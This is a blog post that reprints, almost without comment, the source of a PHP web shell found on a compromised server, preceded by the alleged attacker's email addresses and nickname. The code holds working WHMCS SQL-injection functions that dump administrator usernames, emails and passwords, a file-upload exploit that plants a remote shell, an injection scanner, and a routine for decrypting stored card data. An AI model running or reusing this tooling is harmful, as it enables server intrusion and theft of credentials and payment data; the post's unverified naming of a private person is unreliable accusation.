Skip to main content

php shell found on a hacked server

php shell found on a hacked server

andriroot@gmail.com is the email of the attacker. He's known as andri Cyber4rt, he's from jakarta,
he usually use the same email for frauds, he usually abuses of old bugs of whcms, plesk and so on.
His alt. email address is andri.cyber4rt@gmail.com.


 if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin(){
echo "<html><head><title>./DM ExploiterZ [ 0day ]</title>
<style>body {font-family: 'Audiowide',serif;font-size: 20px;} </style></head>
<body bgcolor=black><center><br><br>
<nobr><font face=Audiowide color=blue>ExploiterZ <font color=white>[ 0day ]</font></nobr><br><br>
<form method=post>
<img src='https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-ash3/t1/994064_479867415465112_1199170647_n.jpg'><br><br>
:: Password :: <br><br>
<input size=30 style='color:blue;background-color:#000000' type='password' name='pass'>
<input style='color:blue;background-color:#000000' type=submit value=' Login Cuk '></font></form><br><br>";
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'andriroot@gmail.com'; # ganti dengan email kamu

$error[] = 'You have an error in your SQL';
$error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver';
$error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function tengah($string, $awal, $akhir){
$string = " ".$string;
$strings = strpos($string,$awal);
if ($strings == 0) return "";
$strings += strlen($awal);
$antara = strpos($string,$akhir,$strings) - $strings;
return substr($string,$strings,$antara);
}

function konek($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function filter($string){
if(get_magic_quotes_gpc() != 0){
return stripslashes($string);
} else {
return $string;
}
}


function letItBy(){
ob_flush();
flush();
}

function getAlexa($url){
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}


function google($query, $page=1){
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=en&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function hajar($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack1($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,roleid,0x3a,username,0x3a,email,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack2($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,password,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}


function dm($url,$injection){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($injection),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function get_base_dir($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$parts = explode('/',$URL);
$newURL = "http://";
for ($i = 0; $i < count($parts); $i++) {
if(strpos($parts[$i],'.php') == false)
$newURL .= $parts[$i] . "/";
}
return $newURL;
}
 
function vb_vuln($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$URL = str_replace(".php","",$URL);
$xURL = explode("/",$URL);
$count = 0;
foreach ($xURL as $dir) {
if($count != 0)
$URL = $URL . $dir . "/";
else $URL = $dir;
$source = "";
$arr = parse_url('http://' . $URL);
if(strpos($URL, '?')) return 'EOF';
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
elseif($headers = get_headers('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'))) {
if((substr($headers[0], 9, 3) == '200' || substr($headers[0], 9, 3) == '302') && substr($headers[7], 9, 3) != '404') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/core/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
}
$hash ="";
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
preg_match_all('|var CUSTNUMBER="(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
$count++;
}
}

function check_injection($url){
$data = http_get( str_replace("=", "='", $url) );
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}#i", $data);
}

function req($url,$fields){
$opts = array(
CURLOPT_HEADER =>1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => 'http://www.sms-online.web.id/'.$url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $fields,
);
$ch=curl_init();
curl_setopt_array($ch,$opts);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function fc_vuln($url) {
$shell = dirname($url) . '/temp/ganteng.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "/home/cpdebx/public_html/fc/ganteng.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@ganteng.php") != false)
return $shell;
else
return "Fail!";
}

function inject($url,$anu){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($anu),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string){
$hash = (function_exists('sha1')) ? sha1($string):md5($string);
$out = '';
$c = 0;
while ($c < strlen($hash)){
$out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
$c += 2;
}
return $out;
}

Comments

Post a Comment

Popular posts from this blog

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more

Database Collation when installing Opencart 3.x, 4.x

  To avoid several problems the database collation for opencart should be as follows: - for Opencart 4.0.1.1 and above it should be " utf8mb4_general_ci " - for Opencart 1.5.51 (Opencart  2.x, Opencart 3.x ) up to Opencart 4.0.1.0 the collation should be " utf8_general_ci " - for Opencart 1.4.1 up to Opencart 1.5.4.1 the collation should be " utf8_bin " - for Opencart <1.1.1 up to Opencart 1.4.0 the collation should be " utf8_unicode_ci " If you are using the latest version of mysql always use " utf8mb4_general_ci ". Never use UTF8mb3*
Post a Comment
Read more